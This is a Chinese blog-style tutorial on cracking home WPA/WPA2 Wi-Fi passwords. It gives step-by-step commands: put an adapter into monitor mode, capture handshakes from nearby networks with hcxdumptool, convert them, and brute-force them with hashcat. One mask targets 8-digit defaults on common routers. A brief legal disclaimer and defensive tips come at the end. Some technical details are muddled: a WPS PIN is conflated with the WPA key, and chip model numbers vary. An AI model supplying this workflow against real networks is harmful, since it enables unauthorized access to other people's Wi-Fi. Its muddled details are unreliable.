WIFI密码是如何被破解

随着科技以及网络不断地发展，WIFI已经深入我们生活的方方面面了。现在大家的安全意识越来越强了，自己家的WIFI都使用密码进行加密。

现在绝大多数的人都在使用WPA和WPA2进行加密，可是这真的很安全吗？

其实现在已经可以破解了，如果你有一张甚至多张足够快的显卡，你甚至可以在几分钟内将密码破解掉。

特别是很多XX-LINK和X星的路由器，其默认的WPS密码只是8位的数字，就更容易被破解了。

下面就由UP来介绍WIFI密码是如何被破解的。

1. 硬件需求：

   我们需要一张支持监视模式的无线网卡。(某宝和海鲜市场都可轻松买到)

   如果只是想要破解2.4G的网络(B/G/N)，UP推荐买一张采用Atheros AR9271芯片的USB无线网卡。此芯片的无线网卡即插即用，无需安装驱动。

   但是如果想要破解5G网络(A/N/AC)，UP则推荐买一张采用Realtek RTL8122AU或者是RTL8122BU的USB网卡。此芯片的无线网卡需要手动安装驱动程序，且破解前要打开监视模式，否侧容易出错退出。

   UP这里使用的是RTL8812BU芯片的无线网卡。

   
   

2. 操作系统：

   我们需要使用支持扫描的LINUX操作系统。可以使用Kali Linux或者Parrot OS。

   UP这里使用的是Kali Linux 2022.3。

   
   

3. 破解软件：

   我们需要使用以下软件：

   hcxdumptool：扫描无线网络

   hcxpcapngtool：(包含在hcxtools中) 转换文件格式以方便破解

   hashcat：破解密码工具

   
   

下面UP介绍破解过程：

1. 安装破解操作系统。这里UP就不过多介绍了。基本上就是下载安装ISO 》烧录到U盘 》从U盘启动 》安装操作系统。

   可在以下网站下载ISO文件：

   Kali Linux：https://cdimage.kali.org/kali-2022.3/kali-linux-2022.3-installer-amd64.iso

   Parrot OS：https://bunny.deb.parrot.sh//parrot/iso/5.1/Parrot-security-5.1_amd64.iso

   
   

2. 安装更新。(以Kali Linux为例)

   sudo apt update

   
   

    sudo apt upgrade

    3.  安装网卡驱动(UP安装的是RTL8122BU的网卡)

        sudo apt install dkms bc

        git clone https://github.com/cilynx/rtl88x2bu.git

        cd rtl88x2bu

        make

        sudo make install

        安装后需重启电脑

    4. 安装 hcxdumptool

        sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config      

        git clone https://github.com/ZerBea/hcxdumptool.git

        cd hcxdumptool

        make

        sudo make install

    5. 安装hcxtools

        git clone https://github.com/ZerBea/hcxtools.git

        cd hcxtools

        make

        sudo make install

    6. 关闭NetworkManager

        sudo systemctl stop NetworkManager.service

    7. 关闭wpa_supplicant

        sudo systemctl stop wpa_supplicant.service

    8. 开启网卡监视模式

        sudo iwconfig wlan0 mode monitor

    9. 开始扫描网络

        sudo hcxdumptool -i wlan0 -o scan01.pcapng --active_beacon --enable_status=15

        让程序运行一会就会扫描到附近的无线网络。

        按Ctrl+C退出，扫描结果已经存储到scan01.pcapng文件。

    10. 将结果文件转换成Hash Cat支持的格式。

         hcxpcapngtool -o hash.hc22000 -E essidlist scan01.pcapng

    11. 找到想要破解的SSID，并将其MAC地址拷贝到粘贴板。

    12. 打开Hash文件，搜索MAC地址，将其他不需要的项目删除。

    13. 下载Hash Cat并解压(可在Linux和Windows下运行)

        https://hashcat.net/files/hashcat-6.2.6.7z

    14. 运行Hash Cat进行破解。(穷举模式)

        Linux：hashcat -m 22000 hash.hc22000 -a 3

        Windows: hashcat.exe -m 22000 hash.hc22000 -a 3

        如果是XX-LINK或者X星的路由器，可以尝试数字破解模式 (默认8位数字密码)

        Linux: hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

        Windows: hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

        程序会自动使用显卡加速，比单单用CPU要快很多。RTX3090和RX6900XT可能只需几秒至几分钟就可以破解8位数字密码。

    15. 显示破解密码

        在上次命令后加入--show来显示密码

        Linux：hashcat -m 22000 hash.hc22000 -a 3 --show

        Windows: hashcat.exe -m 22000 hash.hc22000 -a 3 --show

        Linux: hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d --show

        Windows: hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d --show

注意！此贴只为技术交流，UP破解的也是自家的无线网络。破解他人WIFI是违法违规的行为，请大家不要随便破解他人网络。

那我们如何尽量避免网络被破解呢？根据你家的网络情况，你可以考虑以下几种方案。

1. 如果你是发烧友，且家里有NAS和OPENWRT的路由器，你可以采用企业级网络验证。安装RADIUS服务，采取证书验证方式。

2. 如果你的路由器比较新，你可以将加密方式改为WPA3。

3. 如果以上都无法满足，你可以尝试将密码的长度加长，并且包含大小写字母，数字以及特殊字符。尽量加大破解的难度，延长破解时间。

4. 同时养成定期更换密码的好习惯，也可以最大限度的减少损失。

5. 最后，如果你用的是XX-LINK和X星等路由器的话，一定要及时把WPS功能关闭。默认的8位数字密码太容易被破解了。